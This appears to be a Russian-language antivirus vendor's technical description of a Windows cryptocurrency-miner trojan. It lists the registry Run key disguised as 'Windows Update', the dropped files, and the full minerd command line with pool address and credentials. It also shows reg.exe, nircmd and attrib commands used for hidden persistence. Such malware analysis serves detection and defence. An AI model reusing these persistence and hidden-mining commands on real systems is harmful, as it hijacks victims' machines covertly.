Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Update' = '%WINDIR%\syso\critical\antivirus.bat'
Вредоносные функции:
Создает и запускает на исполнение:
- '%WINDIR%\syso\critical\minerd.exe' --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.3:123
- '<SYSTEM32>\nircmd.exe' exec hide antivirus.bat
Запускает на исполнение:
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /t REG_SZ /d "%WINDIR%\syso\critical\antivirus.bat" /f
- '<SYSTEM32>\cmd.exe' /c antivirus.bat
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\syso\critical\sys.bat" "
- '<SYSTEM32>\attrib.exe' %WINDIR%\syso\critical +h
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\syso\critical\sys.bat
- %WINDIR%\syso\critical\pthreadGC2.dll
- %WINDIR%\syso\critical\libcurl-4.dll
- %WINDIR%\syso\critical\zlib1.dll
- %WINDIR%\syso\critical\libcurl.dll
- %WINDIR%\syso\critical\antivirus.bat
- %WINDIR%\syso\critical\nircmd.exe
- %WINDIR%\syso\critical\minerd.exe
Перемещает следующие файлы:
- %WINDIR%\syso\critical\nircmd.exe в <SYSTEM32>\nircmd.exe
Сетевая активность:
Подключается к:
- 'mi##.pool-x.eu':9000
UDP:
- DNS ASK mi##.pool-x.eu
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
